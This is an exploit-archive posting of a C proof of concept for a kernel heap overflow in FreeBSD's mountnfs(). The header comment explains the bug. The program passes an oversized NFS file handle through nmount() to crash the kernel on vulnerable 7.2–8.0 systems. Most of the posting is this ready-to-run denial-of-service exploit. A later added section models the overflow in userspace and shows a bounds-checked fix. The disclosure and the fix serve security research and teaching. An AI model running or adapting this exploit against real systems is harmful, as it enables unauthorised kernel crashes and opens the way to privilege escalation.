FreeBSD Kernel mountnfs() Exploit

Posted on 23 June 2010

/*
 * mountnfsex.c -- Patroklos Argyroudis, argp at domain census-labs.com
 *
 * Local kernel exploit for FreeBSD 8.0, 7.3 and 7.2.
 *
 * Discovered and exploited by Patroklos (argp) Argyroudis.
 *
 * The vulnerability is in mountnfs(), which is reachable through the mount(2)
 * and nmount(2) system calls. For these to be enabled for unprivileged users,
 * the sysctl(8) variable vfs.usermount must be set to a non-zero value.
 *
 * mountnfs() employs an insufficient input validation method when copying
 * data passed in struct nfs_args from userspace to the kernel. Specifically,
 * the file handle to be mounted (nfs_args.fh) and its size (nfs_args.fhsize)
 * are completely user-controllable. In file sys/nfsclient/nfs_vfsops.c from
 * 8.0-RELEASE:
 *
 * 1219         bcopy((caddr_t)argp->fh, (caddr_t)nmp->nm_fh, argp->fhsize);
 *
 * The above can cause a kernel heap overflow when argp->fh is bigger than
 * 128 bytes (the size of nmp->nm_fh), since nmp is an allocated item on
 * the UMA zone nfsmount_zone (again from sys/nfsclient/nfs_vfsops.c):
 *
 * 1164         struct nfsmount *nmp;
 * ...
 * 1175         nmp = uma_zalloc(nfsmount_zone, M_WAITOK);
 *
 * The result is a kernel crash/denial-of-service. I have developed a code
 * execution/privilege escalation exploit, but I will not release it at this
 * point. 7.1-RELEASE and earlier do not seem to be vulnerable since the
 * bug was introduced in 7.2-RELEASE.
 *
 * $Id: mountnfsex.c,v c1302ea1317d 2010/05/23 17:30:17 argp $
 */

#include <sys/param.h>
#include <sys/mount.h>
#include <sys/uio.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sysexits.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <errno.h>

#define BUFSIZE 1024            /* file handle length handed to the kernel; nm_fh holds 128 bytes */
#define FSNAME  "nfs"
#define DIRPATH "/tmp/nfs"

int
main()
{
        struct iovec iov[8];

        mkdir(DIRPATH, 0700);

        /* nmount(2) takes its options as name/value iovec pairs */
        iov[0].iov_base = "fstype";
        iov[0].iov_len = strlen(iov[0].iov_base) + 1;
        iov[1].iov_base = FSNAME;
        iov[1].iov_len = strlen(iov[1].iov_base) + 1;

        iov[2].iov_base = "fspath";
        iov[2].iov_len = strlen(iov[2].iov_base) + 1;
        iov[3].iov_base = DIRPATH;
        iov[3].iov_len = strlen(iov[3].iov_base) + 1;

        /* the "fh" option becomes nfs_args.fh / nfs_args.fhsize in the kernel */
        iov[4].iov_base = "fh";
        iov[4].iov_len = strlen(iov[4].iov_base) + 1;
        iov[5].iov_base = calloc(BUFSIZE, sizeof(char));

        if(iov[5].iov_base == NULL)
        {
                perror("calloc");
                rmdir(DIRPATH);
                exit(EXIT_FAILURE);
        }

        memset(iov[5].iov_base, 0x41, (BUFSIZE - 1));
        iov[5].iov_len = BUFSIZE;

        iov[6].iov_base = "hostname";
        iov[6].iov_len = strlen(iov[6].iov_base) + 1;
        iov[7].iov_base = "census-labs.com";
        iov[7].iov_len = strlen(iov[7].iov_base) + 1;

        printf("[*] calling nmount()\n");

        if(nmount(iov, 8, 0) < 0)
        {
                fprintf(stderr, "[!] nmount error: %d\n", errno);
                perror("nmount");
                rmdir(DIRPATH);
                free(iov[5].iov_base);
                exit(1);
        }

        /* only reached if the kernel survived the oversized copy */
        printf("[*] unmounting and deleting %s\n", DIRPATH);
        unmount(DIRPATH, 0);
        rmdir(DIRPATH);
        free(iov[5].iov_base);

        return 0;
}

/* EOF */

# Inj3ct0r.com [2010-06-23]
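The defect described above is a copy whose length comes from the caller while the destination is a fixed 128-byte member of a zone item. The following added example (not part of the advisory or of FreeBSD's source) models that with a hypothetical flat byte array standing in for consecutive nfsmount_zone items, and places the unchecked copy beside a hardened version that validates fhsize before touching the item; fake_zone, run_case and the 300-byte constructed handle are assumptions of the model.

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#define NFS_FHMAX 128                 /* size of nmp->nm_fh, per the text above */
#define ZONE_BYTES (4 * NFS_FHMAX)    /* constructed: four consecutive zone items */

/* Hypothetical model of consecutive nfsmount_zone items (not FreeBSD's own
 * definitions): bytes 0..127 are the target item's nm_fh, the remaining bytes
 * stand in for the neighbouring items that an oversized copy would overwrite. */
typedef struct { unsigned char mem[ZONE_BYTES]; } fake_zone;
struct outcome { int rc; int clobbered; };

/* Vulnerable pattern (the page's line 1219): copy length is the caller's fhsize. */
static int copy_fh_unchecked(fake_zone *z, const unsigned char *fh, int fhsize) {
    memcpy(z->mem, fh, (size_t)fhsize);
    return 0;
}

/* Hardened pattern: validate fhsize against the destination before copying. */
static int copy_fh_checked(fake_zone *z, const unsigned char *fh, int fhsize) {
    if (fhsize < 0 || fhsize > NFS_FHMAX)
        return EINVAL;
    memcpy(z->mem, fh, (size_t)fhsize);
    return 0;
}

/* Runs one copy routine against a constructed handle of 'A' bytes (fhsize long,
 * kept within the model's bounds) and counts the neighbour bytes that lost
 * their 0xCC canary value, i.e. the size of the heap overflow. */
static struct outcome run_case(int (*copy)(fake_zone *, const unsigned char *, int),
                               int fhsize) {
    unsigned char fh[ZONE_BYTES];
    fake_zone z;
    struct outcome o = { 0, 0 };
    memset(fh, 0x41, sizeof fh);
    memset(z.mem, 0x00, NFS_FHMAX);                            /* target nm_fh */
    memset(z.mem + NFS_FHMAX, 0xCC, ZONE_BYTES - NFS_FHMAX);   /* canary */
    o.rc = copy(&z, fh, fhsize);
    for (size_t i = NFS_FHMAX; i < ZONE_BYTES; i++)
        if (z.mem[i] != 0xCC) o.clobbered++;
    return o;
}
int main(void) {
    struct outcome a = run_case(copy_fh_unchecked, 300), b = run_case(copy_fh_checked, 300);
    printf("unchecked: rc=%d clobbered=%d\nchecked: rc=%d clobbered=%d\n",
           a.rc, a.clobbered, b.rc, b.clobbered);
    return 0;
}
```

With a 300-byte handle the unchecked copy overwrites 172 bytes past nm_fh, while the checked version returns EINVAL and leaves the neighbouring items untouched.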
